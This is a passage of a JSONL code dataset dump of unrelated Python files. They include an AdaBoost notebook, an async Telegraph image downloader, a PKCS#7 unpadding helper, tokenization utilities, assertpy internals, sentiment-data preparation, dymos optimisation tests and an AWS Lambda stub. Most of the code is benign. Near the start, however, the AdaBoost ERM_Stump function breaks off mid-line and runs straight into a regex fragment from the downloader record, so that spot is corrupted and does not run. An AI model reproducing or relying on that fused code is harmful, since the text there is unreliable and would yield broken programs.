csvfile.write('%d,%d\\n' % (p[0], p[1]))\n return\n\n\nif __name__ == \"__main__\":\n func()\n ","sub_path":"Data_Analysis/红酒分类/红酒分类.py","file_name":"红酒分类.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81378210","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Implémentation de l'algorithme **AdaBoost** basé sur des *Decision Stumps*. \n# \n# ### Voir chapitre 10 du livre *Understanding Machine Learning* de S. Shalev-Shwartz et S. Ben-David\n\n# In[89]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nget_ipython().run_line_magic('config', \"InlineBackend.figure_format = 'retina'\")\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport progressbar\nimport seaborn as sns\n\nsns.set()\n\n\n# In[90]:\n\n\nclass Stump:\n def __init__(self,j,theta,b):\n self.j=int(j)\n self.theta=theta\n self.b=b\n def __call__(self,x):\n return np.transpose([self.b*np.sign(self.theta-x[:,self.j])])\n def erreur(self,x,y,D):\n return np.sum(D*(y!=self(x)))\n\n\n# In[91]:\n\n\nclass Hypotheses:\n def __init__(self):\n self.weights=[]\n self.stumps=[]\n self.D=[]\n def add_weight(self,w):\n self.weights.append(w)\n def add_stump(self,h):\n self.stumps.append(h)\n def add_D(self,D):\n self.D.append(D)\n def __call__(self,x):\n T=len(self.weights)\n s=0\n for t in range(T):\n s+=self.weights[t]*self.stumps[t](x)\n return np.sign(s)\n def erreur(self,x,y):\n m=len(y)\n return sum(self(x)!=y)/m\n\n\n# La fonction suivante résout le problème Empirical Risk Minimization pour la classe des Decisions Stumps : il calcule \n# \n# $${\\rm argmin}_{h\\in {\\rm Stump}}\\sum_{i=1}^mD_i \\mathbb 1(h(x_i)\\neq y_i)$$\n\n# In[92]:\n\n\nx = np.array([[0.9421374 , 0.19022691],\n [0.52865533, 0.96814701],\n [0.76081068, 0.74943315],\n [0.72926312, 0.95525445],\n [0.9139678 , 0.4397556 ],\n [0.18559422, 0.22103276],\n [0.92784066, 0.99142989],\n [0.98574519, 0.29678577],\n [0.05191972, 0.59002284],\n [0.88070615, 0.72356571]])\nx\n\n\n# In[93]:\n\n\nm = 10\nindice_tri=np.argsort(x,axis=0)\nxsort=x[indice_tri[:,0]][:,0]\nxsort=np.concatenate((xsort,[xsort[m-1]+1]))\nxsort\n\n\n# In[94]:\n\n\ndef ERM_Stump(x,y,D):\n size=np.shape(x)\n m=size[0]\n d=size[1]\n Fstar=1.e16\n bstar=1\n indice_tri=np.argsort(x,axis=0)\n for j in range(d):\n xsort=x[indice_tri[:,j]][:,j]\n xsort=np.concatenate((xsort,[xsort[m-1]+1]))\n ysort=y[indice_tri[:,j]]\n Dsort=D[indice_tri[:,j]]\n F=np.sum(Dsort*(ysort+1)/2)\n if F|]', '-', title)\n url_list = []\n images = soup.findAll(\"img\")\n for img in images:\n url_list.append('https://telegra.ph' + img['src'])\n return (title, url_list)\n else:\n logging.error('请求失败,状态码为%s' % response.status_code)\n\n\nasync def main(pool, url, path): # 启动\n sem = asyncio.Semaphore(pool)\n worker = get_img_links(url)\n dirname = worker[0]\n links = worker[1]\n file_path = os.path.join(path, dirname)\n if not os.path.exists(file_path):\n os.mkdir(file_path)\n async with aiohttp.ClientSession() as session: # 给所有的请求,创建同一个session\n tasks = []\n [tasks.append(control_sem(sem, url, session, file_path)) for url in links]\n tasks_iter = asyncio.as_completed(tasks)\n # 创建一个进度条\n fk_task_iter = tqdm(tasks_iter, total=len(links), unit='files')\n for coroutine in fk_task_iter:\n # 获取结果\n await coroutine\n\n\nasync def control_sem(sem, url, session, path): # 限制信号量\n async with sem:\n await fetch(url, session, path)\n\n\nasync def fetch(url, session, path): # 开启异步请求\n src_name = url.split('/')[-1]\n async with session.get(url, timeout=60) as resp: # 设置超时\n with open(os.path.join(path, src_name), 'wb') as fd:\n while True:\n chunk = await resp.content.read(1024) # 每次获取1024字节\n if not chunk:\n break\n fd.write(chunk)\n\n\nurl = ''\npath = \"E:\\\\ChromeDownloads\\\\图片助手(ImageAssistant) 批量图片下载器\"\npool_num = 5\nstart = time.time()\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main(pool=pool_num, url=url, path=path))\nend = time.time()\nlogging.info(f'总下载耗时:{end - start}')\n","sub_path":"telegraph/aiohttp_download_image.py","file_name":"aiohttp_download_image.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"420636068","text":"import binascii\n\n ## @param text The padded text for which the padding is to be removed.\n # @exception ValueError Raised when the input padding is missing or corrupt.\ndef decode(text):\n '''\n Remove the PKCS#7 padding from a text string\n '''\n nl = len(text)\n val = int(binascii.hexlify(text[-1]), 16)\n if val > 16:\n raise ValueError('Input is not padded or padding is corrupt')\n l = nl - val\n return text[:l]\n","sub_path":"server/pkcs7.py","file_name":"pkcs7.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"397735346","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*- \n# Author: lionel\nimport collections\nimport tensorflow as tf\n\nimport six\nimport unicodedata\n\n\ndef convert_to_unicode(text):\n \"\"\"Converts `text` to Unicode (if it's not already), assuming utf-8 input.\"\"\"\n if six.PY3:\n if isinstance(text, str):\n return text\n elif isinstance(text, bytes):\n return text.decode(\"utf-8\", \"ignore\")\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n elif six.PY2:\n if isinstance(text, str):\n return text.decode(\"utf-8\", \"ignore\")\n elif isinstance(text, unicode):\n return text\n else:\n raise ValueError(\"Unsupported string type: %s\" % (type(text)))\n else:\n raise ValueError(\"Not running on Python2 or Python 3?\")\n\n\ndef load_vocab(vocab_file):\n \"\"\"Loads a vocabulary file (char) into a dictionary.\"\"\"\n vocab = collections.OrderedDict()\n index = 0\n with tf.gfile.GFile(vocab_file, \"r\") as reader:\n for line in reader:\n token = convert_to_unicode(line)\n if not token:\n continue\n token = token.strip()\n vocab[token] = index\n index += 1\n return vocab\n\n\ndef load_vocab_ids(vocab_file):\n \"\"\"Loads a vocabulary file ( char:id ) into a dictionary.\"\"\"\n vocab = dict()\n with tf.gfile.GFile(vocab_file, \"r\") as reader:\n for line in reader:\n token = convert_to_unicode(line)\n fields = token.split(':')\n if len(fields) != 2:\n continue\n if fields[0] is None:\n continue\n vocab[fields[0].strip()] = int(fields[1])\n return vocab\n\n\ndef is_whitespace(char):\n \"\"\"Checks whether `chars` is a whitespace character.\"\"\"\n # \\t, \\n, and \\r are technically contorl characters but we treat them\n # as whitespace since they are generally considered as such.\n if char == \" \" or char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n return True\n cat = unicodedata.category(char)\n if cat == \"Zs\":\n return True\n return False\n\n\ndef is_control(char):\n \"\"\"Checks whether `chars` is a control character.\"\"\"\n # These are technically control characters but we count them as whitespace\n # characters.\n if char == \"\\t\" or char == \"\\n\" or char == \"\\r\":\n return False\n cat = unicodedata.category(char)\n if cat.startswith(\"C\"):\n return True\n return False\n\n\ndef is_punctuation(char):\n \"\"\"Checks whether `chars` is a punctuation character.\"\"\"\n cp = ord(char)\n # We treat all non-letter/number ASCII as punctuation.\n # Characters such as \"^\", \"$\", and \"`\" are not in the Unicode\n # Punctuation class but we treat them as punctuation anyways, for\n # consistency.\n if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or\n (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):\n return True\n cat = unicodedata.category(char)\n if cat.startswith(\"P\"):\n return True\n return False\n\n\ndef features_labels_digitalize(examples, word_index, maxlen):\n text_a_ids = []\n text_b_ids = []\n label_ids = []\n for example in examples:\n ids_a = text_to_sequence(example.text_a, word_index)\n text_a_ids.append(ids_a)\n label_ids.append(convert_to_unicode(example.label))\n\n if example.text_b is None:\n continue\n ids_b = text_to_sequence(example.text_b, word_index)\n text_b_ids.append(ids_b)\n\n text_a_ids = tf.keras.preprocessing.sequence.pad_sequences(text_a_ids, value=word_index['pad'], padding='post',\n maxlen=maxlen)\n if len(text_b_ids) <= 0:\n text_b_ids = None\n else:\n text_b_ids = tf.keras.preprocessing.sequence.pad_sequences(text_b_ids, value=word_index['pad'],\n padding='post',\n maxlen=maxlen)\n label_ids = tf.keras.utils.to_categorical(label_ids, 2)\n return text_a_ids, text_b_ids, label_ids\n\n\ndef text_to_sequence(text, word_index):\n sequence = []\n for word in list(convert_to_unicode(text)):\n sequence.append(word_index.get(word, word_index.get('unk')))\n return sequence\n","sub_path":"data_utils/tokenization.py","file_name":"tokenization.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632157607","text":"# coding=utf-8\nfrom pyecharts import Pie\nimport pandas as pd\n\npie = Pie(\"奥巴马政策对比\", title_pos=\"center\", width=1600, height=800)\nfile = pd.read_csv(\"presidential_approval_rate.csv\")\n# print(file['political_issue'])\nls_pos1 = [i for i in range(10, 71, 12)] * 2\nls_pos1.append(82)\nls_pos = [30] * 6 + [70] * 7\nfor i in range(len(file['support'])):\n pie.add(file['political_issue'][i], [\"support\", \"oppose\", \"no_opinion\"],\n [file['support'][i], file['oppose'][i], file['no_opinion'][i]],\n center=[ls_pos1[i], ls_pos[i]], radius=[15, 20], is_label_show=True,\n label_pos='center', legend_top='center', label_text_size=15)\npie.render('Pie3.html')\n","sub_path":"chap04/scale_data_keshihua3.py","file_name":"scale_data_keshihua3.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"169534558","text":"# Copyright (c) 2015-2019, Activision Publishing, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its contributors\n# may be used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"Assertion library for python unit testing with a fluent API\"\"\"\n\nfrom __future__ import print_function\nimport os\nimport contextlib\nimport inspect\nimport logging\nimport sys\nimport types\nfrom .base import BaseMixin\nfrom .contains import ContainsMixin\nfrom .numeric import NumericMixin\nfrom .string import StringMixin\nfrom .collection import CollectionMixin\nfrom .dict import DictMixin\nfrom .date import DateMixin\nfrom .file import FileMixin\nfrom .extracting import ExtractingMixin\nfrom .snapshot import SnapshotMixin\nfrom .exception import ExceptionMixin\nfrom .dynamic import DynamicMixin\nfrom .helpers import HelpersMixin\n\n__version__ = '0.15'\n\n__tracebackhide__ = True # clean tracebacks via py.test integration\ncontextlib.__tracebackhide__ = True # monkey patch contextlib with clean py.test tracebacks\n\n\n# soft assertions\n_soft_ctx = 0\n_soft_err = []\n\n@contextlib.contextmanager\ndef soft_assertions():\n global _soft_ctx\n global _soft_err\n\n # init ctx\n if _soft_ctx == 0:\n _soft_err = []\n _soft_ctx += 1\n\n try:\n yield\n finally:\n # reset ctx\n _soft_ctx -= 1\n\n if _soft_err and _soft_ctx == 0:\n out = 'soft assertion failures:'\n for i,msg in enumerate(_soft_err):\n out += '\\n%d. %s' % (i+1, msg)\n # reset msg, then raise\n _soft_err = []\n raise AssertionError(out)\n\n# factory methods\ndef assert_that(val, description=''):\n \"\"\"Factory method for the assertion builder with value to be tested and optional description.\"\"\"\n global _soft_ctx\n if _soft_ctx:\n return builder(val, description, 'soft')\n return builder(val, description)\n\ndef assert_warn(val, description='', logger=None):\n \"\"\"Factory method for the assertion builder with value to be tested, optional description, and\n just warn on assertion failures instead of raisings exceptions.\"\"\"\n return builder(val, description, 'warn', logger=logger)\n\ndef fail(msg=''):\n \"\"\"Force test failure with the given message.\"\"\"\n raise AssertionError('Fail: %s!' % msg if msg else 'Fail!')\n\ndef soft_fail(msg=''):\n \"\"\"Adds error message to soft errors list if within soft assertions context.\n Either just force test failure with the given message.\"\"\"\n global _soft_ctx\n if _soft_ctx:\n global _soft_err\n _soft_err.append('Fail: %s!' % msg if msg else 'Fail!')\n return\n fail(msg)\n\n# assertion extensions\n_extensions = {}\ndef add_extension(func):\n if not callable(func):\n raise TypeError('func must be callable')\n _extensions[func.__name__] = func\n\ndef remove_extension(func):\n if not callable(func):\n raise TypeError('func must be callable')\n if func.__name__ in _extensions:\n del _extensions[func.__name__]\n\ndef builder(val, description='', kind=None, expected=None, logger=None):\n ab = AssertionBuilder(val, description, kind, expected, logger)\n if _extensions:\n # glue extension method onto new builder instance\n for name,func in _extensions.items():\n meth = types.MethodType(func, ab)\n setattr(ab, name, meth)\n return ab\n\n# warnings\nclass WarningLoggingAdapter(logging.LoggerAdapter):\n \"\"\"Logging adapter to unwind the stack to get the correct callee filename and line number.\"\"\"\n def process(self, msg, kwargs):\n def _unwind(frame, fn='assert_warn'):\n if frame and fn in frame.f_code.co_names:\n return frame\n return _unwind(frame.f_back, fn)\n\n frame = _unwind(inspect.currentframe())\n lineno = frame.f_lineno\n filename = os.path.basename(frame.f_code.co_filename)\n return '[%s:%d]: %s' % (filename, lineno, msg), kwargs\n\n_logger = logging.getLogger('assertpy')\n_handler = logging.StreamHandler(sys.stdout)\n_handler.setLevel(logging.WARNING)\n_format = logging.Formatter('%(asctime)s %(levelname)s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n_handler.setFormatter(_format)\n_logger.addHandler(_handler)\n_default_logger = WarningLoggingAdapter(_logger, None)\n\n\nclass AssertionBuilder(DynamicMixin, ExceptionMixin, SnapshotMixin, ExtractingMixin,\n FileMixin, DateMixin, DictMixin, CollectionMixin, StringMixin, NumericMixin,\n ContainsMixin, HelpersMixin, BaseMixin, object):\n \"\"\"Assertion builder.\"\"\"\n\n def __init__(self, val, description='', kind=None, expected=None, logger=None):\n \"\"\"Construct the assertion builder.\"\"\"\n self.val = val\n self.description = description\n self.kind = kind\n self.expected = expected\n self.logger = logger if logger else _default_logger\n\n def _builder(self, val, description='', kind=None, expected=None, logger=None):\n \"\"\"Helper to build a new Builder. Only used when we don't want to chain.\"\"\"\n return builder(val, description, kind, expected, logger)\n\n def _err(self, msg):\n \"\"\"Helper to raise an AssertionError, and optionally prepend custom description.\"\"\"\n out = '%s%s' % ('[%s] ' % self.description if len(self.description) > 0 else '', msg)\n if self.kind == 'warn':\n self.logger.warning(out)\n return self\n elif self.kind == 'soft':\n global _soft_err\n _soft_err.append(out)\n return self\n else:\n raise AssertionError(out)\n","sub_path":"assertpy/assertpy.py","file_name":"assertpy.py","file_ext":"py","file_size_in_byte":6864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"122507642","text":"import pickle\nimport numpy as np\nimport pandas as pd\nfrom keras import Input\nfrom keras.layers import Embedding\n\nfrom absa_config import Config\n\n\ndef list_flatten(l):\n result = list()\n for item in l:\n if isinstance(item, (list, tuple)):\n result.extend(item)\n else:\n result.append(item)\n return result\n\n\ndef build_vocabulary(corpus, start_id=1):\n corpus = list_flatten(corpus)\n return dict((word, idx) for idx, word in enumerate(set(corpus), start=start_id))\n\ntrain_file = pd.read_csv(\"/Users/duty/downloads/zhijiang_race/TRAIN/Train_reviews.csv\")\nlabel_file = pd.read_csv(\"/Users/duty/downloads/zhijiang_race/TRAIN/Train_labels.csv\")\nnew_data = pd.merge(train_file, label_file, on='id')\nfilter_data = pd.DataFrame(new_data, columns=['id', 'Reviews', 'Categories', 'Polarities'])\ndrop_duplicate_data = filter_data.drop_duplicates()\npd.DataFrame.to_csv(drop_duplicate_data.loc[0:4000], \"absa_train_data.csv\", header=True, index=False)\npd.DataFrame.to_csv(drop_duplicate_data.loc[4000:5000], \"absa_valid_data.csv\", header=True, index=False)\npd.DataFrame.to_csv(drop_duplicate_data.loc[5000:], \"absa_test_data.csv\", header=True, index=False)\n\n##处理原始数据分成训练数据和测试数据,将content的字转换为id,将aspect的词组转换为id\n##训练集\ntrain_data = pd.read_csv('absa_train_data.csv', header=0, index_col=None)\ntrain_data['content_char_list'] = train_data['Reviews'].apply(lambda x: list(x))##每个char取出来\ntrain_data['aspect_char_list'] = train_data['Categories'].apply(lambda x: list(x))\ntrain_data['aspect_term_list'] = train_data['Categories'].values\n##验证集\nvalid_data = pd.read_csv('absa_valid_data.csv', header=0, index_col=None)\nvalid_data['content_char_list'] = valid_data['Reviews'].apply(lambda x: list(x))##每个char取出来\nvalid_data['aspect_char_list'] = valid_data['Categories'].apply(lambda x: list(x))\nvalid_data['aspect_term_list'] = valid_data['Categories'].values\n##测试集\ntest_data = pd.read_csv('absa_test_data.csv', header=0, index_col=None)\ntest_data['content_char_list'] = test_data['Reviews'].apply(lambda x: list(x))##每个char取出来\ntest_data['aspect_char_list'] = test_data['Categories'].apply(lambda x: list(x))\ntest_data['aspect_term_list'] = test_data['Categories'].values\n###构造字和id映射 dic形式\ntotal_chars = np.concatenate((train_data['content_char_list'].values, valid_data['content_char_list'].values, test_data['content_char_list'].values)).tolist()\ncontent_char_corpus = build_vocabulary(total_chars, start_id=1)\ntotal_aspect_chars = np.concatenate((train_data['aspect_char_list'].values, valid_data['aspect_char_list'].values, test_data['aspect_char_list'].values)).tolist()\naspect_char_corpus = build_vocabulary(total_aspect_chars, start_id=1)\ntotal_aspect_terms = np.concatenate((train_data['aspect_term_list'].values, valid_data['aspect_term_list'].values, test_data['aspect_term_list'].values)).tolist()\naspect_term_corpus = build_vocabulary(total_aspect_terms, start_id=0)\npickle.dump(content_char_corpus, open(\"./absa_data/content_char_corpus.pkl\", \"wb\"))\npickle.dump(aspect_char_corpus, open(\"./absa_data/aspect_char_corpus.pkl\", \"wb\"))\npickle.dump(aspect_term_corpus, open(\"./absa_data/aspect_term_corpus.pkl\", \"wb\"))\n\n###根据\n\n\n\nprint(\"dd\")\n","sub_path":"absa_data_process.py","file_name":"absa_data_process.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319165339","text":"import os\nimport unittest\nimport numpy as np\nfrom numpy.testing import assert_almost_equal\n\nimport dymos.examples.brachistochrone.test.ex_brachistochrone_vector_states as ex_brachistochrone_vs\nfrom openmdao.utils.testing_utils import use_tempdirs\n\nfrom openmdao.utils.general_utils import set_pyoptsparse_opt, printoptions\nfrom openmdao.utils.assert_utils import assert_check_partials\n\nOPT, OPTIMIZER = set_pyoptsparse_opt('SNOPT')\n\n\nclass TestBrachistochroneVectorStatesExample(unittest.TestCase):\n\n def assert_results(self, p):\n t_initial = p.get_val('phase0.time')[0]\n t_final = p.get_val('phase0.time')[-1]\n\n x0 = p.get_val('phase0.timeseries.states:pos')[0, 0]\n xf = p.get_val('phase0.timeseries.states:pos')[0, -1]\n\n y0 = p.get_val('phase0.timeseries.states:pos')[0, 1]\n yf = p.get_val('phase0.timeseries.states:pos')[-1, 1]\n\n v0 = p.get_val('phase0.timeseries.states:v')[0, 0]\n vf = p.get_val('phase0.timeseries.states:v')[-1, 0]\n\n g = p.get_val('phase0.timeseries.design_parameters:g')\n\n thetaf = p.get_val('phase0.timeseries.controls:theta')[-1, 0]\n\n assert_almost_equal(t_initial, 0.0)\n assert_almost_equal(x0, 0.0)\n assert_almost_equal(y0, 10.0)\n assert_almost_equal(v0, 0.0)\n\n assert_almost_equal(t_final, 1.8016, decimal=4)\n assert_almost_equal(xf, 10.0, decimal=3)\n assert_almost_equal(yf, 5.0, decimal=3)\n assert_almost_equal(vf, 9.902, decimal=3)\n assert_almost_equal(g, 9.80665, decimal=3)\n\n assert_almost_equal(thetaf, 100.12, decimal=0)\n\n def assert_partials(self, p):\n with printoptions(linewidth=1024, edgeitems=100):\n cpd = p.check_partials(method='cs')\n assert_check_partials(cpd)\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_radau_compressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = True\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='radau-ps',\n compressed=True,\n force_alloc_complex=True,\n run_driver=True)\n self.assert_results(p)\n self.assert_partials(p)\n self.tearDown()\n if os.path.exists('ex_brachvs_radau_compressed.db'):\n os.remove('ex_brachvs_radau_compressed.db')\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_radau_uncompressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = True\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='radau-ps',\n compressed=False,\n force_alloc_complex=True,\n run_driver=True)\n self.assert_results(p)\n self.assert_partials(p)\n self.tearDown()\n if os.path.exists('ex_brachvs_radau_uncompressed.db'):\n os.remove('ex_brachvs_radau_uncompressed.db')\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_gl_compressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = True\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='gauss-lobatto',\n compressed=True,\n force_alloc_complex=True,\n run_driver=True)\n\n self.assert_results(p)\n self.assert_partials(p)\n self.tearDown()\n if os.path.exists('ex_brachvs_gl_compressed.db'):\n os.remove('ex_brachvs_gl_compressed.db')\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_gl_uncompressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = True\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='gauss-lobatto',\n transcription_order=5,\n compressed=False,\n force_alloc_complex=True,\n run_driver=True)\n self.assert_results(p)\n self.assert_partials(p)\n self.tearDown()\n if os.path.exists('ex_brachvs_gl_compressed.db'):\n os.remove('ex_brachvs_gl_compressed.db')\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_rungekutta_compressed(self):\n import openmdao.api as om\n import dymos as dm\n from dymos.examples.brachistochrone.brachistochrone_vector_states_ode import \\\n BrachistochroneVectorStatesODE\n\n p = om.Problem(model=om.Group())\n\n p.driver = om.ScipyOptimizeDriver()\n\n p.driver.declare_coloring()\n\n phase = dm.Phase(ode_class=BrachistochroneVectorStatesODE,\n transcription=dm.RungeKutta(num_segments=20, compressed=True))\n\n p.model.add_subsystem('phase0', phase)\n\n phase.set_time_options(fix_initial=True, duration_bounds=(.5, 10))\n\n phase.add_state('pos',\n shape=(2,),\n rate_source=BrachistochroneVectorStatesODE.states['pos']['rate_source'],\n units=BrachistochroneVectorStatesODE.states['pos']['units'],\n fix_initial=True, fix_final=False)\n phase.add_state('v',\n rate_source=BrachistochroneVectorStatesODE.states['v']['rate_source'],\n targets=BrachistochroneVectorStatesODE.states['v']['targets'],\n units=BrachistochroneVectorStatesODE.states['v']['units'],\n fix_initial=True, fix_final=False)\n\n phase.add_control('theta', units='deg',\n targets=BrachistochroneVectorStatesODE.parameters['theta']['targets'],\n rate_continuity=False, lower=0.01, upper=179.9)\n\n phase.add_design_parameter('g',\n targets=BrachistochroneVectorStatesODE.parameters['g']['targets'],\n units='m/s**2', opt=False, val=9.80665)\n\n phase.add_boundary_constraint('pos', loc='final', lower=[10, 5])\n\n # Minimize time at the end of the phase\n phase.add_objective('time', loc='final', scaler=10)\n\n p.model.linear_solver = om.DirectSolver()\n p.setup(check=True, force_alloc_complex=True)\n\n p['phase0.t_initial'] = 0.0\n p['phase0.t_duration'] = 1.80162174\n\n pos0 = [0, 10]\n posf = [10, 5]\n\n p['phase0.states:pos'] = phase.interpolate(ys=[pos0, posf], nodes='state_input')\n p['phase0.states:v'] = phase.interpolate(ys=[0, 9.9], nodes='state_input')\n p['phase0.controls:theta'] = phase.interpolate(ys=[0.46, 100.22900215],\n nodes='control_input')\n p['phase0.design_parameters:g'] = 9.80665\n\n p.run_driver()\n\n self.assert_results(p)\n self.tearDown()\n\n\nclass TestBrachistochroneVectorStatesExampleSolveSegments(unittest.TestCase):\n\n @classmethod\n def tearDownClass(cls):\n for filename in ['phase0_sim.db', 'brachistochrone_sim.db']:\n if os.path.exists(filename):\n os.remove(filename)\n\n def assert_results(self, p):\n t_initial = p.get_val('phase0.time')[0]\n t_final = p.get_val('phase0.time')[-1]\n\n x0 = p.get_val('phase0.timeseries.states:pos')[0, 0]\n xf = p.get_val('phase0.timeseries.states:pos')[0, -1]\n\n y0 = p.get_val('phase0.timeseries.states:pos')[0, 1]\n yf = p.get_val('phase0.timeseries.states:pos')[-1, 1]\n\n v0 = p.get_val('phase0.timeseries.states:v')[0, 0]\n vf = p.get_val('phase0.timeseries.states:v')[-1, 0]\n\n g = p.get_val('phase0.timeseries.design_parameters:g')\n\n thetaf = p.get_val('phase0.timeseries.controls:theta')[-1, 0]\n\n assert_almost_equal(t_initial, 0.0)\n assert_almost_equal(x0, 0.0)\n assert_almost_equal(y0, 10.0)\n assert_almost_equal(v0, 0.0)\n\n assert_almost_equal(t_final, 1.8016, decimal=4)\n assert_almost_equal(xf, 10.0, decimal=3)\n assert_almost_equal(yf, 5.0, decimal=3)\n assert_almost_equal(vf, 9.902, decimal=3)\n assert_almost_equal(g, 9.80665, decimal=3)\n\n assert_almost_equal(thetaf, 100.12, decimal=0)\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_radau_compressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = False\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='radau-ps',\n compressed=True,\n force_alloc_complex=True,\n solve_segments=True)\n\n p.final_setup()\n # set the final optimized control profile from\n # TestBrachistochroneVectorStatesExample.test_ex_brachistochrone_vs_radau_compressed\n # and see if we get the right state history\n theta = np.array([2.54206362, 4.8278643, 10.11278149, 12.30024503, 17.35332815,\n 23.53948016, 25.30747573, 29.39010464, 35.47854735, 37.51549822,\n 42.16351471, 48.32419264, 50.21299389, 54.56658635, 60.77733663,\n 62.79222351, 67.35945157, 73.419141, 75.27851226, 79.60246558,\n 85.89170743, 87.96027845, 92.66164608, 98.89108826, ])\n\n p['phase0.controls:theta'] = theta.reshape((-1, 1))\n p['phase0.states:v'][:] = 100. # bad initial guess on purpose\n p['phase0.states:v'][0] = 0. # have to set the initial condition\n\n p['phase0.states:pos'][:] = 100.\n p['phase0.states:pos'][0, 0] = 0. # have to set the initial condition\n p['phase0.states:pos'][0, 1] = 10. # have to set the initial condition\n\n p['phase0.t_duration'] = 1.8016 # need the final duration (ivp style)\n\n p.run_model()\n self.assert_results(p)\n # self.assert_partials(p)\n self.tearDown()\n if os.path.exists('ex_brachvs_radau_compressed.db'):\n os.remove('ex_brachvs_radau_compressed.db')\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_gl_compressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = False\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='gauss-lobatto',\n compressed=True,\n force_alloc_complex=True,\n solve_segments=True)\n\n theta = np.array([1.04466973, 6.40253991, 12.26063396, 18.51810659, 25.07411252,\n 31.59842762, 37.76082779, 43.8810928, 50.27900244, 56.67270776,\n 62.78035981, 68.93138259, 75.45520008, 81.95935786, 88.05140149,\n 94.03879494, 100.22900215])\n\n p['phase0.controls:theta'] = theta.reshape((-1, 1))\n p['phase0.states:v'][:] = 100 # bad initial guess on purpose\n p['phase0.states:v'][0] = 0 # have to set the initial condition\n\n p['phase0.states:pos'][:] = 100\n p['phase0.states:pos'][0, 0] = 0 # have to set the initial condition\n p['phase0.states:pos'][0, 1] = 10. # have to set the initial condition\n\n p['phase0.t_duration'] = 1.8016 # need the final duration (ivp style)\n\n p.run_model()\n self.assert_results(p)\n\n self.tearDown()\n if os.path.exists('ex_brachvs_gl_compressed.db'):\n os.remove('ex_brachvs_gl_compressed.db')\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"dymos/examples/brachistochrone/test/test_ex_brachistochrone_vector_states.py","file_name":"test_ex_brachistochrone_vector_states.py","file_ext":"py","file_size_in_byte":11831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"398886198","text":"from __future__ import print_function\nfrom pprint import pprint\nfrom contextlib import closing\nimport json \nimport boto3\n\ndef lambda_handler(event, context):\n \n client = boto3.client('s3') \n s3 = boto3.resource('s3', aws_access_key_id='__AWS_ID__',aws_secret_access_key='__AWS_KEY__')\n \n bucket = event['Records'][0]['s3']['bucket']['name']\n key = event['Records'][0]['s3']['object']['key']\n obj = client.get_object(Bucket=bucket, Key=key)\n \n #get json data from s3 object\n jdata=obj['Body'].read()\n \n #parse json\n parsed_json1 = 